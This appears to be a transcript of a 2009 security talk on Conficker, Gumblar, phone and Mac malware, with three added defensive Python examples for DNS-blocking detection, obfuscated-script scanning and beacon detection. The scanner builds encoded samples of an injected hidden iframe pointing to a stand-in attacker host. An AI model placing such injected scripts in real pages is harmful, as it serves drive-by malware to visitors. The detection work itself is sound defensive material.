Presentation Transcript

Evolving Threats

Paul A. Henry

MCP+I, MCSE, CCSA, CCSE, CISSP-ISSAP, CISM, CISA, CIFI, CCE

Florida PI License C2800597

Forensics & Recovery LLC

Florida PI Agency License A2900048


Welcome To My World

  • Conficker update

  • Risk of banking via cell phone rising

  • Backdoor in a box

    • Covert channels on a budget

  • Obfuscation wins again

    • Adobe issues not going away

  • Wireless network tap

    • Sniffing a network from 300 meters

  • What’s that light at the end of the tunnel

    • Patch that Mac

  • Old Malware never dies


Conficker Update

  • Upgrades

    • No longer limited to 250 domains for updates

      • 50,000 domains

      • Peer to peer updates

      • Blocks access to a larger range of security sites

    • First nefarious use of the Conficker botnet detected

      • More is sure to come
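The "blocks access to security sites" behaviour on this slide is something a host can be checked for. The following is an added example, not part of the presentation: it resolves a handful of security-vendor host names next to control names that no malware has a reason to block, and reports "suspect" when the vendor names fail while the controls resolve. The vendor and control name lists, the 80% threshold and the simulated infected resolver are assumptions of mine for illustration, not the worm's actual block list; a real deployment would load the block list for the variant in question.

```python
"""Detect Conficker-style selective DNS blocking.

Added example, not from the presentation. Later Conficker variants refused
lookups of names containing security-vendor strings; this check resolves a
few vendor names alongside control names and compares the results.
VENDOR_NAMES, CONTROL_NAMES and the 0.8 threshold are illustrative
assumptions, not the worm's real block list.
"""
import socket
from typing import Callable, Dict, List, Tuple

VENDOR_NAMES: List[str] = [
    "www.symantec.com",
    "www.mcafee.com",
    "www.kaspersky.com",
    "www.sophos.com",
    "www.f-secure.com",
]
# Controls: names an infected host should still resolve normally.
CONTROL_NAMES: List[str] = ["www.example.com", "www.iana.org", "www.wikipedia.org"]

Resolver = Callable[[str], bool]


def system_resolve(name: str) -> bool:
    """True if this host's own resolver returns an address for name."""
    try:
        socket.gethostbyname(name)
        return True
    except OSError:  # socket.gaierror / socket.herror are OSError subclasses
        return False


def simulated_infected_resolver(name: str) -> bool:
    """Constructed stand-in for an infected host: refuses vendor names only."""
    blocked_substrings = ("symantec", "mcafee", "kaspersky", "sophos", "f-secure")
    return not any(s in name for s in blocked_substrings)


def probe(names: List[str], resolve: Resolver) -> Dict[str, bool]:
    return {n: resolve(n) for n in names}


def assess(vendor: Dict[str, bool], control: Dict[str, bool],
           min_blocked_fraction: float = 0.8) -> str:
    """Return 'no-dns', 'suspect', 'partial' or 'clean'."""
    if not any(control.values()):
        return "no-dns"          # resolver is down entirely; nothing to conclude
    blocked = [n for n, ok in vendor.items() if not ok]
    fraction = len(blocked) / len(vendor)
    if fraction >= min_blocked_fraction:
        return "suspect"         # vendor names fail while controls succeed
    if blocked:
        return "partial"         # worth a look, but could be ordinary DNS trouble
    return "clean"


def check(resolve: Resolver = system_resolve) -> Tuple[str, Dict[str, bool], Dict[str, bool]]:
    """Probe both lists with the given resolver and return the verdict plus raw results."""
    vendor = probe(VENDOR_NAMES, resolve)
    control = probe(CONTROL_NAMES, resolve)
    return assess(vendor, control), vendor, control


if __name__ == "__main__":
    # Offline demonstration against the constructed resolver, then the real one.
    verdict, vendor, control = check(simulated_infected_resolver)
    print("simulated host:", verdict, [n for n, ok in vendor.items() if not ok])
    print("this host:", check()[0])
```

The control names matter: without them, a host with no DNS at all would look "infected", so the check refuses to conclude anything when every control fails.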


Big Money

  • 1.8M unique users were redirected to the rogue Anti-Virus software during 16 consecutive days

  • Members of the affiliate network were rewarded 9.6 cents "a piece" for each successful redirection, which totals

    $172,800, or $10,800 per day


Introducing Gumblar - Son of Conficker

  • In 2008 one website was compromised every 5 sec

    • Now it is one every 4.5 sec

  • End game is the same – deliver malware

  • Gumblar is building two botnets

    • First botnet is made up of compromised web servers and is used to distribute “drive-by” malware across web servers

    • Second botnet is made up of PCs that visit the web sites and become infected

      • These PCs become part of a spam-spewing botnet
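The first Gumblar botnet works by planting obfuscated script in pages served by compromised web servers, which is also what the agenda's "Obfuscation wins again" point is about. The following is an added example, not from the presentation and not any vendor's Gumblar signature: a small scanner that pulls inline scripts out of HTML and flags the ones showing several obfuscation indicators at once, shown beside a naive byte signature so that the fragility of the signature approach is visible. The sample pages, the payload, the placeholder host name attacker.invalid, the heuristics and their thresholds are all constructed assumptions of mine.

```python
"""Flag injected, obfuscated <script> blocks and show why a byte signature is
fragile.

Added example, not from the presentation or any vendor's Gumblar signature.
The HTML pages and the injected payload are constructed; attacker.invalid is
a placeholder. The heuristics (eval, decoder/sink calls, long escape runs,
entropy) and their thresholds are my own rules of thumb.
"""
import math
import re
from collections import Counter
from typing import List, Tuple

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)


def shannon_entropy(text: str) -> float:
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def inline_scripts(html: str) -> List[str]:
    return SCRIPT_RE.findall(html)


def score_script(body: str) -> List[str]:
    """Return the heuristic indicators that fire on one script body."""
    reasons = []
    if re.search(r"\beval\s*\(", body):
        reasons.append("eval")
    if re.search(r"\bunescape\s*\(|fromCharCode|document\.write\s*\(", body):
        reasons.append("decoder-or-sink")
    if re.search(r"(?:%[0-9a-fA-F]{2}){20,}|(?:\\x[0-9a-fA-F]{2}){20,}", body):
        reasons.append("long-escape-run")
    if len(body) > 200 and shannon_entropy(body) > 4.8:
        reasons.append("high-entropy")
    return reasons


def scan(html: str, min_reasons: int = 2) -> List[Tuple[int, List[str]]]:
    """Index and indicators of every inline script with at least min_reasons."""
    findings = []
    for idx, body in enumerate(inline_scripts(html)):
        reasons = score_script(body)
        if len(reasons) >= min_reasons:
            findings.append((idx, reasons))
    return findings


def byte_signature_hit(html: str, signature: str) -> bool:
    """The naive approach: exact substring match on one known sample."""
    return signature in html


# --- constructed samples -------------------------------------------------
PAYLOAD = 'document.write("<iframe src=http://attacker.invalid/x width=0 height=0></iframe>")'
CLEAN_PAGE = ("<html><body><script>function init(){var m=document.getElementById('menu');"
              "m.className='open';}</script><p>hello</p></body></html>")
# Variant 1: payload hidden as %xx escapes, decoded with unescape().
INJECTED_V1 = CLEAN_PAGE.replace(
    "</body>",
    '<script>eval(unescape("' + "".join("%%%02x" % ord(c) for c in PAYLOAD) + '"))</script></body>')
# Variant 2: same payload re-encoded as char codes; every byte of the script differs.
INJECTED_V2 = CLEAN_PAGE.replace(
    "</body>",
    "<script>eval(String.fromCharCode(" + ",".join(str(ord(c)) for c in PAYLOAD) + "))</script></body>")
# A signature cut from variant 1 ("document" as %xx escapes).
SIGNATURE_FROM_V1 = "%64%6f%63%75%6d%65%6e%74"


if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("v1", INJECTED_V1), ("v2", INJECTED_V2)]:
        print(name, "signature:", byte_signature_hit(page, SIGNATURE_FROM_V1),
              "heuristics:", scan(page))
```

Requiring two indicators rather than one keeps ordinary minified pages out of the findings; the signature, by contrast, matches only the exact encoding it was cut from and misses the second variant entirely.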


Introducing Gumblar - Son of Conficker

  • Gumblar is now found on 42% of all discovered compromised websites


Root Cause…

  • This really drives home the underlying problem with network security today…

  • One of the most successfully exploited vulnerabilities today is RDS (MDAC)

  • This one vulnerability is responsible for over 70% of compromises by automated toolkits

  • Did I mention that the vulnerability was patched three years ago…



Pinch Lives On…

  • Even while the authors sit in prison Pinch continues to infect users


It’s Not Rocket Science…

  • It is common knowledge that you can eliminate 90% of your risk by applying patches in a timely manner

  • It was recently reported by IBM that over 70% of Microsoft vulnerabilities in 2008 could be mitigated by simply enforcing the “rule of least privilege”


Now This Is Interesting…

  • For sale: used Nokia 1100, $30,000

  • A software issue in the Nokia 1100 makes it easily reprogrammable

    • Assume any identity

    • Actively being used in the UK to capture banking PINs sent via SMS


Pogo Plug – Backdoor in a box

  • Allows anything connected via USB to be easily shared across the Internet

    • Hard drive

    • Ethernet adapter

    • Wireless adapter


Pogo Plug – Backdoor in a box

  • Yes, there are a few good uses, but…
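A box that shares a USB device across the Internet from inside the perimeter has to reach out over the ports the firewall already allows, which is why the summary calls for re-evaluating outbound 80/443. The following is an added example, not from the presentation: a small analyzer over firewall session logs that flags outbound web-port flows behaving like a reverse-connect relay (long-lived and upload-heavy) or a beacon (sessions at regular intervals) rather than browsing. The log format, the thresholds and the sample log lines are all constructed assumptions of mine.

```python
"""Flag outbound web-port flows that behave like a reverse-connect relay or a
beacon rather than browsing.

Added example, not from the presentation. The log format (ISO time, src, dst,
dport, duration in seconds, bytes out, bytes in), the thresholds and the log
lines below are all constructed assumptions for illustration.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, Iterable, List, Tuple

WEB_PORTS = {80, 443}
MIN_TOTAL_SECONDS = 3600      # flows to one peer alive for an hour or more
UPLOAD_RATIO = 3.0            # bytes out at least 3x bytes in: the inside box is serving
MIN_BEACONS = 5               # need this many sessions to judge regularity
MAX_JITTER = 0.1              # stdev/mean of inter-session gaps at or below this is "regular"

FlowKey = Tuple[str, str, int]


def parse_line(line: str) -> Dict:
    ts, src, dst, dport, dur, out_b, in_b = line.split()
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
            "dport": int(dport), "dur": int(dur), "out": int(out_b), "in": int(in_b)}


def analyze(lines: Iterable[str]) -> List[Tuple[FlowKey, List[str]]]:
    """Group sessions by (src, dst, dport) on 80/443 and report the suspicious groups."""
    flows: Dict[FlowKey, List[Dict]] = defaultdict(list)
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        rec = parse_line(line)
        if rec["dport"] in WEB_PORTS:
            flows[(rec["src"], rec["dst"], rec["dport"])].append(rec)

    findings = []
    for key, recs in flows.items():
        reasons = []
        total_dur = sum(r["dur"] for r in recs)
        out_b = sum(r["out"] for r in recs)
        in_b = sum(r["in"] for r in recs)
        if total_dur >= MIN_TOTAL_SECONDS and out_b >= UPLOAD_RATIO * max(in_b, 1):
            reasons.append("persistent-upload-heavy")
        if len(recs) >= MIN_BEACONS:
            times = sorted(r["ts"] for r in recs)
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            avg = mean(gaps)
            if avg > 0 and pstdev(gaps) / avg <= MAX_JITTER:
                reasons.append("regular-beacon")
        if reasons:
            findings.append((key, reasons))
    return findings


# Constructed sample: one relay-like host, one ordinary browser, one beaconing host.
SAMPLE_LOG = """
# time                src       dst            dport dur_s  bytes_out  bytes_in
2009-06-01T08:00:00  10.0.0.5  203.0.113.10   443   7200   524288000  2097152
2009-06-01T08:01:10  10.0.0.7  198.51.100.20  443   12     4096       180000
2009-06-01T08:02:20  10.0.0.7  198.51.100.20  443   8      3000       95000
2009-06-01T08:09:00  10.0.0.7  198.51.100.20  443   30     9000       410000
2009-06-01T08:09:15  10.0.0.7  198.51.100.20  443   5      1200       64000
2009-06-01T08:24:15  10.0.0.7  198.51.100.20  443   20     5000       250000
2009-06-01T09:00:00  10.0.0.9  203.0.113.40   80    1      300        200
2009-06-01T09:01:00  10.0.0.9  203.0.113.40   80    1      300        200
2009-06-01T09:02:01  10.0.0.9  203.0.113.40   80    1      300        200
2009-06-01T09:03:00  10.0.0.9  203.0.113.40   80    1      300        200
2009-06-01T09:03:59  10.0.0.9  203.0.113.40   80    1      300        200
2009-06-01T09:05:00  10.0.0.9  203.0.113.40   80    1      300        200
""".strip().splitlines()


if __name__ == "__main__":
    for (src, dst, dport), reasons in analyze(SAMPLE_LOG):
        print(f"{src} -> {dst}:{dport}: {', '.join(reasons)}")
```

The browsing host makes as many sessions as the beaconing one, but its gaps are irregular and it downloads more than it uploads, so neither rule fires on it; the two rules are deliberately independent so a relay that is idle most of the time still trips the beacon check.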


20,000 Illegal Downloads….

  • Pirated copies of iWork contained malware


First Mac BotNet

  • First use of the iBotnet was a DDoS attack


First Mac BotNet

  • Apple is currently associated with 57 different software products and numerous hardware platforms

  • A search of reported vulnerabilities in OS X shows 128 Secunia advisories and 866 reported vulnerabilities

    • http://secunia.com/advisories/product/96/

      That light at the end of the tunnel is an oncoming train…



Summary

  • We have yet to feel the impact of Conficker – more to come

  • Cell phones are becoming a viable target

  • Pogo Plug demonstrates the need to re-evaluate outbound access on 80/443

  • We need to rethink signatures; the current model is doomed to fail

  • Wireless network taps will play a part in data leakage

  • Security by obscurity is over for Mac

  • Obfuscation brings new life to old malware


  • Forensics & Recovery LLC

  • Florida PI License A 29004

  • www.forensicsandrecovery.com

  • Paul A. Henry

  • MCP+I, MCSE, CCSA, CCSE, CISSP-ISSAP, CISM, CISA, CIFI, CCE

  • Florida PI License C2800597

  • 25 SE 69th Place, Ocala, FL 34480, Telephone (954) 854 9143

